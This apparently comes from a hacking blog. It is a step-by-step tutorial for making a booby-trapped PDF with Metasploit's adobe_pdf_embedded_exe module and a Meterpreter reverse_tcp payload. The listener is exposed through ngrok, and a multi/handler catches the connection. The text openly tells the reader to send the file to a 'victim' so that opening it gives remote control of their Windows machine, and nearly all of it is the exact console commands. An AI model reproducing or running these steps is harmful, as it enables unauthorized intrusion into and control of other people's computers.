How to Hack windows with pdf file using metasploit

 Hello guy’s in this article we are going to discuss about how to hack windows with pdf file using metasploit. Just you follow this below step one by one

Requirements for android

  • Android version 5.0 and above
  • Termux application
  • Metasploit

How to create malicious Pdf file

Step 1:

First you open your terminal and type this below command this command will help you top metasploit on your terminal.

msfconsole

Step 2:

Now we choose exploit so type this below command this command will help you to create pdf exploit in your system

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Step 3:

Once you choose exploit now type this below command this command will help you to set payload connection.

 set payload windows/meterpreter/reverse_tcp

Step 4:

Now we set LPORT and LHOST so run ngrok get lport and lhost if you use local host ip and port that will only work on same wifi connection so i preferred ngrok this will work on out of network.
 

Step 5:

Now we choose LHOST and LPORT in ngrok so type this following command in your metasploit terminal.
set LHOST ( your host id)
set LPORT (your port number)

Step 6:

Now we need to set pdf file name so type this below command on your metasploit terminal.

set FILENAME test.pdf

Step 7: 

Now type this below command this command will help you to make pdf payload in above configuration.

exploit

That’s it guy’s now our pdf will will be successfully created so next we need to run multi handler on your metasploit terminal once you run multi-handler you sent this pdf file to victim if victim click the pdf file in their system our multi handler session will opened we can control victim device remotely.

How to create listener in our metasploit

Just you type this below command in your metasploit one by one 
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (your ip address)
set LPORT (your port number)
exploit

So as the victim opens the PDF file, a meterpreter connection will be eatablished. You can perform lots of operation after that. Just type help and there will be list of commands which you can execute

Post a Comment

Previous Post Next Post